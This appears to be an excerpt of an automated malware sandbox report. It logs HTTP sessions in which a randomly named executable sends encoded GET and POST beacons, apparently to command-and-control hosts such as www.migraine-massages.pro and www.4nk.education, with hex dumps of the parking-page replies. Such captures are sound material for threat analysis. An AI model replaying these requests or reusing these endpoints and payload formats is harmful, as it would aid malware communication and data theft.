                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.549917217.70.184.50804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:03.401639938 CET382OUTGET /gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:40:04.188254118 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:04 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'nonce-b1d227afc1b64e6c801d7bbda9206dfd';
                                                                                                                                                  Vary: Accept-Language
                                                                                                                                                  Data Raw: 39 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 62 31 64 32 32 37 61 66 63 31 62 36 34 65 36 63 38 30 31 64 37 62 62 64 61 39 32 30 36 64 66 64 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-b1d227afc1b64e6c801d7bbda9206dfd';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
                                                                                                                                                  Nov 14, 2024 15:40:04.188272953 CET1236INData Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                                                                                                  Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
                                                                                                                                                  Nov 14, 2024 15:40:04.188283920 CET166INData Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                                                                                                  Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.549952199.59.243.227804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:09.389461994 CET663OUTPOST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 42 6c 2b 49 79 39 4d 47 33 35 58 77 43 65 63 33 7a 56 46 43 4c 71 56 6a 44 59 65 77 56 48 6b 64 6b 73 36 58 4a 34 3d
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CBl+Iy9MG35XwCec3zVFCLqVjDYewVHkdks6XJ4=
                                                                                                                                                  Nov 14, 2024 15:40:10.018647909 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:09 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: e41a7048-b535-43f3-9289-7d2857d15f08
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=e41a7048-b535-43f3-9289-7d2857d15f08; expires=Thu, 14 Nov 2024 14:55:09 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:40:10.018678904 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTQxYTcwNDgtYjUzNS00M2YzLTkyODktN2QyODU3ZDE1ZjA4IiwicGFnZV90aW1lIjoxNzMxNTk1Mj


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.549966199.59.243.227804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:11.940773010 CET683OUTPOST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 47 74 7a 51 51 70 68 6c 6d 4e 48 48 38 4b 4a 65 76 67 64 44 48 4a 44 54 32 76 59 6a 4d 69 51 43 4c 71 74 47 4f 4e
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrGtzQQphlmNHH8KJevgdDHJDT2vYjMiQCLqtGON
                                                                                                                                                  Nov 14, 2024 15:40:12.583775043 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:12 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: 0dce5f4f-2ba4-4a46-a4a3-2d939a352d11
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=0dce5f4f-2ba4-4a46-a4a3-2d939a352d11; expires=Thu, 14 Nov 2024 14:55:12 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                  Nov 14, 2024 15:40:12.583887100 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGRjZTVmNGYtMmJhNC00YTQ2LWE0YTMtMmQ5MzlhMzUyZDExIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.549977199.59.243.227804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:14.487375975 CET1700OUTPOST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 78 4b 39 53 4f 51 34 67 42 53 4f 71 2b 37 34 42 6f 4f 34 7a 53 71 61 42 41 59 4f 39 4c 42 65 52 4f 6d 4d 45 4b 4b 54 6e 4e 5a 4a 30 6d 39 69 68 72 68 53 4a 66 4d 77 50 47 6a 61 73 37 65 65 57 39 49 42 36 37 72 6e 76 67 33 71 4a 39 70 36 2f 47 38 68 67 4a 46 42 5a 79 79 4b 79 58 59 37 72 5a 69 74 75 4d 6b 53 56 52 6c 50 79 46 49 79 43 6c 4c 36 74 77 4e 71 73 4d 54 4d 6c 37 78 6a 6e 4a 56 72 6a 34 39 63 39 34 73 69 6a 45 6d 64 44 65 62 67 46 53 50 45 49 4c 66 73 53 59 4f 56 42 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+elJ5QXwirl/5pMQbraug7Q9UqepvIpkuQQLhBRXSXHlYeYtYR45opue+mluAIbd3Ducn/d9YTscwYzx4Q9dVJLwB84EOdydKzjKHv7SRxcuSs7M+dcQrQ/v2H3xxPjlKb2xK9SOQ4gBSOq+74BoO4zSqaBAYO9LBeROmMEKKTnNZJ0m9ihrhSJfMwPGjas7eeW9IB67rnvg3qJ9p6/G8hgJFBZyyKyXY7rZituMkSVRlPyFIyClL6twNqsMTMl7xjnJVrj49c94sijEmdDebgFSPEILfsSYOVBO3xjfbqvVgqILMV+XdNen1T2RAKwgO61cdKBGTtU6jKl3QmG+QBfkGD4JujR4lTc0z/tuIYBJx+9OFq9JeKqcyyQ4FQGzsVvyUywtcU3v+h1+jVriAlw1EP9YkYcNmC57f/7TmAYd1wIQngAXcZCI/f8fVxjRUZbYHr+iSZqeEjdXfxTrekmDWF8YywgnizENOK3yPs28GzJsz+LeRAuy/UeWHyGyoS0/ImzePlHWYDTVEGoBp4H3RW4w5AHzRClooNsFXPT6YVAYmAxyEX21RQ5L7WKm+9HHcbZgt1LZySYucOYQrXU5XYsS7ZudoazCYeEa9ikEOPIEgf++dUfPNBz6Y4fwxfmTVu1BJNXNj9/OthTFGsLfbAErSC5WcGd6c5oYbL6beXeMGWqoWbjtLvu73dT4K01LSGKzYzu/TnxFJN9PYoqizJkUdMUc/Kk0NZWrDis7MD3Ix65ZGAfVBzdHGGipJ6rJm+FSk6j3jMlwrJAaOEQ3E0gf9co0ibN8BCo6bMbOvgr6Ol28zRZBteIyvNrdyUZuxsEbaBPsISxh5Zu2fG27Z5WzsYElmsZoLHwkGc7IFzzT4lVToRysj/jnXmMWdSASwCHD2CNGYPFa3k9pfU3i5hreXwcoBcWFv2+vGYViAHgKfJLSM6Nb/CBi/CB/rpRC1 [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:40:15.134236097 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:14 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: eb79255e-47ff-4722-be6b-158a4ef7316c
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=eb79255e-47ff-4722-be6b-158a4ef7316c; expires=Thu, 14 Nov 2024 14:55:15 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
